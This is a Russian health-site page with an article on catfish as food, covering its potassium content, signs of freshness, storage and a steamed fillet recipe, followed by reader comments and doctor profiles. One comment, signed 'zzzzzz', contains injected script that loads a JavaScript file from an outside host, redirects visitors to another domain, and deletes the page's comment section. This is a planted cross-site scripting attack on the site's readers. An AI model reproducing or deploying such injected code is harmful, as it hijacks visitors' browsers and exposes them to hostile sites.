Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Что такое сом и с чем его...  >>  Что такое сом и с чем его едят?
 
Обратная связь
 

Что такое сом и с чем его едят?

Размер шрифта
26 марта 2012 10:00
  • google_analytics: false
  • Нравится

Чем полезно мясо сома и может ли оно быть лечебным? Как приготовить сома так, чтобы его полезные пищевые качества достались вам, а не сковородке?

1 

Сом отличается от других рыб не только плоской пастью. Сом, живущий в реках и озерах Среднерусской возвышенности, может обладать весом до 100 кг и более. Заблуждением является мнение, что сом – падальщик. На самом деле, сом – хищник, питающийся ракообразными, насекомыми, лягушками, рыбой и даже птицей.

В отличие от других рыб, у сома нет чешуи. Эта хищная рыба обладает большим запасом мяса, содержащего множество полезных аминокислот и жиров. Жирный хвост сома даже использовался на Руси в крестьянской кухне как начинка для пирога. Сом в большом количестве содержит микроэлементы, в том числе калий, без которого невозможно нормальное функционирование всего организма. Калий предотвращает отеки и нормализует давление, в отличие от натрия, задерживающего жидкость.

По количеству калия мясо сома обгоняет мясо щуки и мясо форели:

Сом
Щука
Форель

1

Как выбрать

Следует сначала определить – сом ли перед вами? У сома нет чешуи, большая голова, плоский рот, пара усов и мелкие глазки. Хвост сома (плесо) не похож на рыбий, сплюснут с боков, и непонятно, где он начинается.

У свежей рыбы не должно быть мутных глаз, жабры должны быть розовыми, а брюхо – белое и не вздутое. Ямка после нажатия пальцем на тело рыбы должна моментально разгладиться.

Как хранить

Охлажденное филе сома хранится не более 2 суток, желательно – на нижней полке холодильника. Выпотрошенная и мытая рыба, завернутая в фольгу и помещенная в вакуумный контейнер, может храниться в морозилке 2-3 месяца.

1

Как приготовить

Филе сома лучше приготовить на пару. Импровизированная пароварка делается из сетчатого дуршлага и кастрюльки с рыбным бульоном. Время приготовления рыбного белка короткое, блюдо готовится быстро. Специфический запах мяса сома можно убрать, полив сырое филе лимонным соком и выдержать в соке 15 минут.

Рецепт:

Филе сома, приготовленное на пару рыбного бульона со специями.
Шпинат, обжаренный с шампанским.
Шампиньоны обжаренные.
Полить лимонным соком.




Сюжеты по теме:
Ни хвоста, ни чешуи. Готовим рыбу сом

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - ntym

26 марта 2012 в 10:53

Цитировать   |   Пожаловаться

на сома очень похож внешне налим. Все перечисленные признаки характерны и для него. отличаются они внешне только цветом кожи.

ntym 26 марта 2012 в 10:53
на сома очень похож внешне налим
 Спасибо за внимание к нашим материалам и уточнения, хотя сом и налим как пишут, "родственниками" не являются, вместе не обитают. 

3 - helena

28 марта 2012 в 15:21

Цитировать   |   Пожаловаться

Да, они не родственники, внутреннее строение у них отличается немного, да и налим жирнее и вкуснее. Но внешне они ничем, кроме окраски не отличаются, и это следовало бы уточнить, раз описываете отличительные признаки рыбы.

4 - zzzzzz

30 июня 2015 в 23:48

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.